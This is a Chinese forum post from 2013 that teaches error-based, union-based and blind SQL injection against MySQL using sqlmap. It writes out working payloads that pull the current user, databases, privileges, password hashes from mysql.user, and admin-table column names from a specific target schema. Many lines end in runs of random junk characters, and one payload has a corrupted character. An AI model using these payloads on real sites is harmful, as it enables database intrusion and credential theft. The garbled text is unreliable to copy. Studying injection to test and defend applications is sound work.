找回密码
 立即注册
查看: 2849|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。7 Q. H& k+ K0 X. i% ]2 _. q

: M7 K% R' U' Q这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
5 l$ p" h* Y- q
$ o% B* p! m, V  M: n, }8 ]分类标准        分类        备注
% d5 v/ ?6 k1 [) T, s按字段类型        整型注入,字符型注入       
; S9 v2 G" N$ P* r按出现的位置        get注入,post注入,cookie注入,http header注入       
# M, L, `" b( m  J/ E& h然而高级注入是这样的) j8 @" _- x: o$ ^
5 s3 w! r8 i7 A4 {$ Z0 ?& j0 {: I3 K
高级注入分类        条件, ?' E9 J' e+ G$ t+ }" D
error-based sql        数据库的错误回显可以返回,存在数据库,表结构7 ^) U" Q( x+ b5 w- N
union-based sql        能够使用union,存在数据库,表结构) i2 R. f9 ~; ~' f7 [6 N
blind sql        存在注入, Y& M& x: s; q" h  L6 j6 Q" z
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
" Y1 r. W9 ~& S, F! J' T9 b& D1 Z , W1 ^$ Z6 E! Q# |5 p3 x
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
; f/ U) v  @* v
% X& Q; |1 x# }+ q6 U附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
* }# k# M! u4 G, I6 Z
; X# _8 e! e8 q/ V  u这里用mysql说明
) r( o# V+ _4 T. L
! |; j& R, N( R; A2 Z, }e注入坛子里很多了,请看戳我或者再戳我' Q5 E1 l7 M2 X0 h
0 O; F4 ?- b( i
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的- U+ s# z2 `; i$ N
3 C4 a& z+ ]- a0 V3 A6 @
获取当前数据库用户名
1 n7 [# @% Q% t( U7 B0 u. e " V+ N* p0 u' N: {7 d% }5 n" l
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
/ C$ N" K, J. P; h$ L+ m" gAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL( u7 H- J  d4 L! b6 F
L, NULL#
+ |$ X0 o3 a: A7 ?) T' J6 l" m注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。: T1 N7 @! {; {; c( s$ i+ K

/ j6 t/ D* {( \获取数据库名& t) B1 d# d+ I5 a0 m8 u! }
, s6 Y7 Z& N4 _( f: k! N0 O" z2 {- F
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
* g* g: N6 E; D$ K/ ?获取所有用户名
- k6 r) @. E! o9 }  u* ]
* }$ j3 s" I, X2 o' k$ l8 F! h) CUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#! j4 g, O" ?6 q' n% b# [2 K
查看当前用户权限1 J  F6 q! ~5 H) Z
) N: d- e1 O* k' b. J
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
0 _7 I9 |( o  h: C, V尝试获取密码,当然需要有能读mysql数据库的权限
5 c: W: {1 I' d3 } : Q- }4 q% f( D. ?# v
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
9 b6 [) u% `- H8 i7 T9 N9 K; ]& x获取表名,limit什么的自己搞啦
  |- I- i! R2 ~4 K6 n/ {5 f
) s% Q6 Q) V8 ^7 `% x% z5 Q6 @UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#3 V. E" f, O1 s* i; ^
获取字段名及其类型
# L, I0 J3 ^3 X( X& Y& n  BUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
0 |3 g0 o1 J4 c
2 E2 y6 D1 i; Xb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
; O& Z$ `6 `. Z3 g+ @ # f8 q* _# I2 m
如:/ \% {$ K) I- c! A* T, n* H; K) J; T& d6 `
获取当前用户名
1 e# S2 X8 p( c# b0 q; ~) t % ~% d! O% R6 H" Q( b6 \
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
0 `# l/ M! W% D9 d% R获取当前数据库
) _- K2 F* B$ d$ t
* t5 S" A' ]- P# V( b7 VAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
, X$ v; K' ]& h- G; p3 G3 N9 j获取表名2 N* X6 T0 w  F: @6 k, O1 J4 y

/ Y6 f6 P9 ?: l( G9 o# RAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
6 n- o$ n) `4 e( a% I: y获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
0 y$ T7 w8 ?. T3 l2 N. c回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
6 W" Y+ J" q) M* y1 {" a爆表
0 a* k, y) R5 m4 y3 E5 p) y2 a8 i+ E" u 4 M: S- H6 m8 m4 ?! `
AND EXISTS(select * from table)
; x1 i+ N& i* G6 f5 Q  J4 G爆字段  n* ^7 u- c% j5 C/ d  S# M# q

; W6 R0 [" b5 ]5 `, g5 j( MAND EXISTS(select pwd from table)
: b5 @6 f/ N7 \& ?$ A7 C4 p0 n盲注的变化就比较多了,由于篇幅,只是举个例子而已。; q# x: V% m, v% W0 {( J4 Z. \" ^

, p% ^; c9 J8 ]( {6 Z本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
- s" A. o+ i9 z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表